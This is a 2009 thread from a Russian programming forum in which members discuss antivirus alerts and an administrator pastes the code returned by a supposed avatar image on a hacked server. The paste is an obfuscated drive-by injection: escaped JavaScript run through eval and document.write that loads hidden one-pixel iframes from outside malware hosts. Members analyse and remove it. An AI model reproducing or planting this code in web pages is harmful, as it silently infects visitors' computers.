Модераторы: LSD

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Avast - реакция на открытие ветки о Vit`е 
:(
    Опции темы
Riply
Дата 9.7.2009, 15:19 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Комодератор
Сообщений: 572
Регистрация: 27.3.2007
Где: St. Petersburg
Вот что он выдал:
http://pic.ipicture.ru/uploads/090709/6LFRI1715H.jpg


--------------------
Решение задач под заказ
PM MAIL   Вверх
Alexeis
Дата 9.7.2009, 15:47 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Амеба
Group Icon


Профиль
Группа: Админ
Сообщений: 11743
Регистрация: 12.10.2005
Где: Зеленоград
Riply, уже неделю аvira вопит на 3 ветки форума. Я послал им как ложное, надеюсь что оно действительно ложное, потому что 2 антивируса это уже плохо...


--------------------
Vit вечная память.

Обсуждение действий администрации форума производятся только в этом форуме

гениальность идеи состоит в том, что ее невозможно придумать
PM ICQ Skype   Вверх
Alexeis
Дата 9.7.2009, 16:05 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Амеба
Group Icon


Профиль
Группа: Админ
Сообщений: 11743
Регистрация: 12.10.2005
Где: Зеленоград
  Шухер отменяется, пришел ответ
Цитата

The file '4605.html' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection will be removed from our virus definition file (VDF) with one of the next updates. 



--------------------
Vit вечная память.

Обсуждение действий администрации форума производятся только в этом форуме

гениальность идеи состоит в том, что ее невозможно придумать
PM ICQ Skype   Вверх
azesmcar
Дата 9.7.2009, 16:07 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


uploading...
****


Профиль
Группа: Участник Клуба
Сообщений: 6291
Регистрация: 12.11.2004
Где: Армения
при попытке открыть http://mvdr.ru/avatar.jpg Мозилла выдает Reported Attack Site!
Скорее всего и вправду вирус.
PM   Вверх
Alexeis
Дата 9.7.2009, 16:11 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Амеба
Group Icon


Профиль
Группа: Админ
Сообщений: 11743
Регистрация: 12.10.2005
Где: Зеленоград
azesmcar, вирус с jpeg-e  smile . Я себе заблокировал этот файл тоже, но как jpeg может повредить чему либо?

Добавлено через 6 минут и 42 секунды
Епт ну и жпега
Код

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY><script>document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e));</script><script>eval(unescape("%76%61%72%20%63%39%36%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%63%39%36%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at mvdr.ru
</ADDRESS>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0073\u0072\u0063\u003d\u0022\u0020\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0067\u006c\u006f\u006e\u0064\u0069\u0073\u002e\u0063\u006e\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0032\u0022\u0020\u002f\u003e')</script><iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?3" /></body>
</HTML>

<!--
   - Unfortunately, Microsoft has added a clever new
   - "feature" to Internet Explorer. If the text of
   - an error's message is "too small", specifically
   - less than 512 bytes, Internet Explorer returns
   - its own error message. You can turn that off,
   - but it's pretty tricky to find switch called
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - enough to make Internet Explorer happy. The
   - workaround is pretty simple: pad the error
   - message with a big comment like this to push it
   - over the five hundred and twelve bytes minimum.
   - Of course, that's exactly what you're reading
   - right now.
   -->



Добавлено через 9 минут и 20 секунд
azesmcar, усе, ссылка на аватару удалена с форума. 


--------------------
Vit вечная память.

Обсуждение действий администрации форума производятся только в этом форуме

гениальность идеи состоит в том, что ее невозможно придумать
PM ICQ Skype   Вверх
azesmcar
Дата 9.7.2009, 16:24 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


uploading...
****


Профиль
Группа: Участник Клуба
Сообщений: 6291
Регистрация: 12.11.2004
Где: Армения
Цитата(Alexeis @  9.7.2009,  16:11 Найти цитируемый пост)
azesmcar, вирус с jpeg-e  smile . Я себе заблокировал этот файл тоже, но как jpeg может повредить чему либо? 

Честно говоря я не совсем понял что там вообще происходит.  smile 
PM   Вверх
Данкинг
Дата 9.7.2009, 18:54 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Yersinia pestis
****


Профиль
Группа: Завсегдатай
Сообщений: 8302
Регистрация: 7.11.2006
Где: მოსკოვი
Цитата(Alexeis @  9.7.2009,  17:11 Найти цитируемый пост)
Я себе заблокировал этот файл тоже, но как jpeg может повредить чему либо?

Не знаю, но Аваст периодически на вирусы .jpg действительно ругается.


--------------------
There's nothing left but silent epitaphs.
PM MAIL WWW   Вверх
Vasay
Дата 9.7.2009, 19:17 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
****


Профиль
Группа: Завсегдатай
Сообщений: 2097
Регистрация: 8.3.2006
Цитата(azesmcar @  9.7.2009,  16:24 Найти цитируемый пост)
Честно говоря я не совсем понял что там вообще происходит.



Примерно так: файла с jpg на сервере не было. Сервер отвечал страницей 404, на которой с помощью закодированного js открывался другой сайт в ifram-е ( ), который впаривал троян. 

Правда, я думаю, для пользователей vingrad-а это не представляло опасности, так как браузер ожидая получит jpg, получив 404 страницу не выполнял js на ней. (надеюсь, по крайней мере, на это)

Учитывая, что сайт с avatar.jpg принадлежит mvdr (судя по названию). Вероятней всего кто-то взломал его сервер. 

Это сообщение отредактировал(а) Vasay - 9.7.2009, 19:22


--------------------
Придумать идеальную защиту от дурака невозможно, дураки, наудивление, изобретательны.
PM MAIL   Вверх
krundetz
Дата 9.7.2009, 19:59 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Вечный странник
***


Профиль
Группа: Завсегдатай
Сообщений: 1400
Регистрация: 14.6.2007
Где: НН(Сормово)
насколько я в курсе, jpg может представлять угрозу для компьютеров под управлением windows и не только, если сделан определенным образом. По моему связано с реализацией самого алгоритма, ведет к переполнению буфера и вследствие возможности перехватить управление компьютером.


--------------------
!цензоры - Хранитель стратегической жидкости
Группа ТГВ
Группа Нижний Новгород
user posted image
PM MAIL   Вверх
pycha
Дата 11.7.2009, 13:50 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


главный анастазиолог
*


Профиль
Группа: Участник
Сообщений: 239
Регистрация: 20.6.2008
Где: Украина
каспер тоже кстати ругался.
--------------------
ищу хакера со знанием компьютера длятехкт
PM MAIL ICQ   Вверх
ТоляМБА
Дата 12.7.2009, 00:37 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Котэ
***


Профиль
Группа: Завсегдатай
Сообщений: 1607
Регистрация: 15.12.2004
Цитата(krundetz @  9.7.2009,  21:59 Найти цитируемый пост)
jpg может представлять угрозу для компьютеров под управлением windows и не только

krundetz, опаснее твоего аватара только Хиросима
PM   Вверх
ConstantinXXX
Дата 12.7.2009, 11:39 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 246
Регистрация: 27.5.2006
Где: U.S.A. :-)
Каспер тоже предупреждает. =)

http://s44.radikal.ru/i105/0907/4a/5cbad66b394d.jpg

Это и не джепег походу, а просто при обращении за аватаркой, скрипт возвращает джепег =)
--------------------
Как вы относитесь к девушкам, которые курят сигареты?Как не ослепнуть за компьютером© ORENCODE.info
PM MAIL WWW   Вверх
Alexeis
Дата 12.7.2009, 12:20 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Амеба
Group Icon


Профиль
Группа: Админ
Сообщений: 11743
Регистрация: 12.10.2005
Где: Зеленоград
Цитата(ConstantinXXX @  12.7.2009,  10:39 Найти цитируемый пост)
Это и не джепег походу, а просто при обращении за аватаркой, скрипт возвращает джепег =)

  Да где вы его находите? Удалили же.


--------------------
Vit вечная память.

Обсуждение действий администрации форума производятся только в этом форуме

гениальность идеи состоит в том, что ее невозможно придумать
PM ICQ Skype   Вверх
bilbobagginz
Дата 12.7.2009, 14:39 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Naughtius Maximus
****


Профиль
Группа: Экс. модератор
Сообщений: 8813
Регистрация: 2.3.2004
Где: Israel
Цитата(krundetz @  9.7.2009,  19:59 Найти цитируемый пост)
По моему связано с реализацией самого алгоритма, ведет к переполнению буфера и вследствие возможности перехватить управление компьютером. 

для защиты от переполнения буфферов в современных процах есть защита в железе, а в винде есть DEP (data execution prevention). 
Включите на все программы, и по крайней мере такого рода вирусы вам не страшны.




--------------------
Я ещё не демон. Я только учусь.
PM WWW   Вверх
bems
Дата 12.7.2009, 16:21 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
****


Профиль
Группа: Комодератор
Сообщений: 3400
Регистрация: 5.1.2006
Цитата(bilbobagginz @  12.7.2009,  14:39 Найти цитируемый пост)
для защиты от переполнения буфферов в современных процах есть защита в железе, а в винде есть DEP
Не у всех "современные" процы. Я вот исжу на п4\. где такой фичи нет. А DEP без аппаратной поддержки не рулит



--------------------
Обижено школьников: 8
PM MAIL   Вверх
Ответ в темуСоздание новой темы Создание опроса
Правила раздела «Флейм»
Sneg0k

Добро пожаловать в «Флейм».

В разделе не действуют многие правила:

  • Можно оффтопить(умеренно)
  • Можно общаться на темы, не только связанные с программированием.

Строго запрещено:

  • Размещать рекламу
  • Обсуждать политику
  • Оскорблять друг-друга и переходить на личности
  • Наезжать, провоцировать других участников форума
  • Материться
  • Троллить

Напоминаем о существовании волшебной кнопочки "Репорт". Если вы увидели сообщение, несовместимое с жизнью, просьба подвести на нее курсор и клацнуть левой клавишей мышки. Тем самым вы сможете призвать злого, но жутко справедливого джина-модератора, который нашлет порчу на злостного нарушителя. Кстати - счётчик сообщений здесь не растёт.


Глас Винграда:


Глас Философии:

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, Sneg0k

 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | Флейм | Следующая тема »

Подписаться на тему | Подписка на этот форум | Скачать/Распечатать тему


 




[ Время генерации скрипта: 0.1153 ]   [ Использовано запросов: 21 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
 По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.